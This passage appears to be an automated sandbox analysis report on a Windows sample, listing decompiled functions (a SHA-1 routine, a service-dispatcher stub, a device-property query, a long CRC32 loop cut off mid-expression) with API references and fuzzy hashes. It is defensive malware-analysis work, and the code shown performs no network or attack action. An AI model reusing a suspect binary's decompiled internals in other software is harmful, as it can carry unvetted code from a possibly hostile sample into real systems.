0x0040ac7b
0x0040ac7e
0x0040ac85
0x00000000
0x00000000
0x0040ac87
0x0040ac85
0x00000000
0x0040ac5a
0x0040acb0

APIs

SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040AC47
GetLastError.KERNEL32 ref: 0040AC51

Part of subcall function 00403F10: lstrlenA.KERNEL32(00407F26,?,0040817E,00407D67,000000FF), ref: 00403F27
Part of subcall function 00403F10: HeapFree.KERNEL32(015D0000,00000000,00000000), ref: 00403F6A

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: DeviceErrorFreeHeapLastPropertyRegistrySetuplstrlen
String ID:
API String ID: 3804063639-0
Opcode ID: 6966709beb886fbaa612bc8a15c4cfda749e160b1a4bda6072d777385385265e
Instruction ID: 570d91555905ceceefd4964b8de2bb2d4e58388f1b44e39defa146c2b614ec3c
Opcode Fuzzy Hash: 6966709beb886fbaa612bc8a15c4cfda749e160b1a4bda6072d777385385265e
Instruction Fuzzy Hash: 15116DB5D04208FBEB10DFD5D844BEEBBB8AB44308F10816AE515B6284D77C9A54CF9B

Uniqueness

Uniqueness Score: 5.06%

Function 0040B450, Relevance: 2.6, Strings: 2, Instructions: 53COMMON

Download Yara Rule

Strings

hXMV, xrefs: 0040B4D6
hXMV, xrefs: 0040B499

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID:
String ID: hXMV$hXMV
API String ID: 0-400149659
Opcode ID: ec58ca5a487fda1634e0317841b0f5c76a0f333013084a82b16d0e5b6f545ad4
Instruction ID: 387178b887c2d7dcf6f3d82221eee54629974d9187558ddaf354fc2362d78835
Opcode Fuzzy Hash: ec58ca5a487fda1634e0317841b0f5c76a0f333013084a82b16d0e5b6f545ad4
Instruction Fuzzy Hash: AC01A171E082499EDB10CF49DD41BAAB7B8E744724F20423BE025F23C0DB391A018B9D

Uniqueness

Uniqueness Score: 0.22%

Function 00401420, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00401420() {
				int _t4;
				signed int _t9;

				while(0 != 0) {
				}
				__eflags =  *0x41e018;
				if(__eflags == 0) {
					 *0x41e018 = 0x41f694;
					E00404820(__eflags, 0x41f694, 5, 8, 0x4201bc);
				}
				_t9 =  *0x41ffac; // 0x0
				_t4 = StartServiceCtrlDispatcherA(0x41e018 + _t9 * 8);
				__eflags = _t4;
				if(_t4 != 0) {
					__eflags = 0;
					return 0;
				} else {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					return 0xffffffff;
				}
			}

0x00401423
0x00401427
0x00401429
0x00401430
0x00401432
0x0040144a
0x0040144f
0x00401452
0x00401460
0x00401466
0x00401468
0x00401475
0x00000000
0x0040146a
0x0040146a
0x0040146a
0x0040146c
0x00000000
0x00000000
0x0040146e
0x00000000
0x00401470

APIs

StartServiceCtrlDispatcherA.ADVAPI32(?,?,00403474), ref: 00401460

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CtrlDispatcherServiceStart
String ID:
API String ID: 3789849863-0
Opcode ID: 8d1519ce8fb4e3591653e04883eec19a0d2d8d8f9aae5a494e27f4a88e0e4bb5
Instruction ID: 13e007ac46f85e4b853ac90169d91be98d69916de982f5975485aad9e9d16dfd
Opcode Fuzzy Hash: 8d1519ce8fb4e3591653e04883eec19a0d2d8d8f9aae5a494e27f4a88e0e4bb5
Instruction Fuzzy Hash: ECF0ED343003059AE7205F60AC05BA33698B351718F60C53BE818AA2F1E7FDC64AA6DE

Uniqueness

Uniqueness Score: 0.49%

Function 0040CEA0, Relevance: 1.5, Strings: 1, Instructions: 278
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040CEA0(void* _a4) {
				signed int _v8;
				unsigned int _v336;
				unsigned int _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				signed int _v360;
				unsigned int _v364;
				signed int _v368;
				signed int _v372;
				intOrPtr _t268;
				void* _t444;

				_v356 = 0x5a827999;
				_v352 = 0x6ed9eba1;
				_v348 = 0x8f1bbcdc;
				_v344 = 0xca62c1d6;
				_v372 = 0;
				while(_v372 < 0x10) {
					 *(_t444 + _v372 * 4 - 0x148) = ( *(_a4 + 0x1c + _v372 * 4) & 0x000000ff) << 0x18;
					 *(_t444 + _v372 * 4 - 0x148) = ( *(_a4 + 0x1d + _v372 * 4) & 0x000000ff) << 0x00000010 |  *(_t444 + _v372 * 4 - 0x148);
					 *(_t444 + _v372 * 4 - 0x148) = ( *(_a4 + 0x1e + _v372 * 4) & 0x000000ff) << 0x00000008 |  *(_t444 + _v372 * 4 - 0x148);
					 *(_t444 + _v372 * 4 - 0x148) =  *(_a4 + 0x1f + _v372 * 4) & 0x000000ff |  *(_t444 + _v372 * 4 - 0x148);
					_v372 = _v372 + 1;
				}
				_v372 = 0x10;
				while(_v372 < 0x50) {
					 *(_t444 + _v372 * 4 - 0x148) = ( *(_t444 + _v372 * 4 - 0x154) ^  *(_t444 + _v372 * 4 - 0x168) ^  *(_t444 + _v372 * 4 - 0x180) ^  *(_t444 + _v372 * 4 - 0x188)) << 0x00000001 | ( *(_t444 + _v372 * 4 - 0x154) ^  *(_t444 + _v372 * 4 - 0x168) ^  *(_t444 + _v372 * 4 - 0x180) ^  *(_t444 + _v372 * 4 - 0x188)) >> 0x0000001f;
					_v372 = _v372 + 1;
				}
				_v364 =  *_a4;
				_v340 =  *((intOrPtr*)(_a4 + 4));
				_v360 =  *((intOrPtr*)(_a4 + 8));
				_v368 =  *((intOrPtr*)(_a4 + 0xc));
				_v8 =  *((intOrPtr*)(_a4 + 0x10));
				_v372 = 0;
				while(_v372 < 0x14) {
					_v336 = (_v340 & _v360 |  !_v340 & _v368) + (_v364 << 0x00000005 | _v364 >> 0x0000001b) + _v8 +  *(_t444 + _v372 * 4 - 0x148) + _v356;
					_v8 = _v368;
					_v368 = _v360;
					_v360 = _v340 << 0x0000001e | _v340 >> 0x00000002;
					_v340 = _v364;
					_v364 = _v336;
					_v372 = _v372 + 1;
				}
				_v372 = 0x14;
				while(_v372 < 0x28) {
					_v336 = (_v340 ^ _v360 ^ _v368) + (_v364 << 0x00000005 | _v364 >> 0x0000001b) + _v8 +  *(_t444 + _v372 * 4 - 0x148) + _v352;
					_v8 = _v368;
					_v368 = _v360;
					_v360 = _v340 << 0x0000001e | _v340 >> 0x00000002;
					_v340 = _v364;
					_v364 = _v336;
					_v372 = _v372 + 1;
				}
				_v372 = 0x28;
				while(_v372 < 0x3c) {
					_v336 = (_v340 & _v360 | _v340 & _v368 | _v360 & _v368) + (_v364 << 0x00000005 | _v364 >> 0x0000001b) + _v8 +  *(_t444 + _v372 * 4 - 0x148) + _v348;
					_v8 = _v368;
					_v368 = _v360;
					_v360 = _v340 << 0x0000001e | _v340 >> 0x00000002;
					_v340 = _v364;
					_v364 = _v336;
					_v372 = _v372 + 1;
				}
				_v372 = 0x3c;
				while(_v372 < 0x50) {
					_v336 = (_v340 ^ _v360 ^ _v368) + (_v364 << 0x00000005 | _v364 >> 0x0000001b) + _v8 +  *(_t444 + _v372 * 4 - 0x148) + _v344;
					_v8 = _v368;
					_v368 = _v360;
					_v360 = _v340 << 0x0000001e | _v340 >> 0x00000002;
					_v340 = _v364;
					_v364 = _v336;
					_v372 = _v372 + 1;
				}
				 *_a4 =  *_a4 + _v364;
				 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 4)) + _v340;
				 *((intOrPtr*)(_a4 + 8)) =  *((intOrPtr*)(_a4 + 8)) + _v360;
				 *((intOrPtr*)(_a4 + 0xc)) =  *((intOrPtr*)(_a4 + 0xc)) + _v368;
				_t268 =  *((intOrPtr*)(_a4 + 0x10)) + _v8;
				 *((intOrPtr*)(_a4 + 0x10)) = _t268;
				 *((intOrPtr*)(_a4 + 0x5c)) = 0;
				return _t268;
			}

0x0040cea9
0x0040ceb3
0x0040cebd
0x0040cec7
0x0040ced1
0x0040ceec
0x0040cf10
0x0040cf3b
0x0040cf66
0x0040cf8e
0x0040cee6
0x0040cee6
0x0040cf9a
0x0040cfb5
0x0040d037
0x0040cfaf
0x0040cfaf
0x0040d048
0x0040d054
0x0040d060
0x0040d06c
0x0040d078
0x0040d07b
0x0040d096
0x0040d0eb
0x0040d103
0x0040d10c
0x0040d126
0x0040d132
0x0040d13e
0x0040d090
0x0040d090
0x0040d149
0x0040d164
0x0040d1af
0x0040d1c7
0x0040d1d0
0x0040d1ea
0x0040d1f6
0x0040d202
0x0040d15e
0x0040d15e
0x0040d20d
0x0040d228
0x0040d289
0x0040d2a1
0x0040d2aa
0x0040d2c4
0x0040d2d0
0x0040d2dc
0x0040d222
0x0040d222
0x0040d2e7
0x0040d302
0x0040d34d
0x0040d365
0x0040d36e
0x0040d388
0x0040d394
0x0040d3a0
0x0040d2fc
0x0040d2fc
0x0040d3b9
0x0040d3ca
0x0040d3dc
0x0040d3ee
0x0040d3f7
0x0040d3fd
0x0040d403
0x0040d40d

Strings

P, xrefs: 0040D302

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 17bd87f89b5fd1cc1ec8a10098476c26f34db0aaa0268bd521febf102b2e6fe5
Instruction ID: e04b85249b74ac62d1fa632693b94ef416a3dfc4217b4e46ee5b564940ea8faa
Opcode Fuzzy Hash: 17bd87f89b5fd1cc1ec8a10098476c26f34db0aaa0268bd521febf102b2e6fe5
Instruction Fuzzy Hash: 31F18F74A04228CBDB65CF59DC90AD9B7B1BF89305F5082D9D84DAB344CB35AE92CF84

Uniqueness

Uniqueness Score: 0.74%

Function 00413120, Relevance: .2, Instructions: 179
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00413120(signed int __eax, signed char __ecx, unsigned int __edx) {
				signed int _t87;
				signed int _t90;
				signed char _t175;
				unsigned int _t181;
				signed int _t207;
				unsigned int _t231;
				unsigned int _t232;

				_t175 = __ecx;
				_t232 = __edx;
				_t87 =  !__eax;
				if(__edx != 0) {
					while((_t175 & 0x00000003) != 0) {
						_t87 = _t87 >> 0x00000008 ^  *(0x4198d8 + (( *_t175 & 0x000000ff ^ _t87) & 0x000000ff) * 4);
						_t175 = _t175 + 1;
						_t232 = _t232 - 1;
						if(_t232 != 0) {
							continue;
						}
						goto L4;
					}
				}
				L4:
				if(_t232 >= 0x20) {
					_t231 = _t232 >> 5;
					do {
						_t207 =  *(0x419cd8 + (( *(0x419cd8 + (( *(0x419cd8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t198 & 0x000000ff) * 4) ^  *(_t175 + 0x10)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (( *(0x419cd8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x41a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x41a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4198d8 + (( *(0x419cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  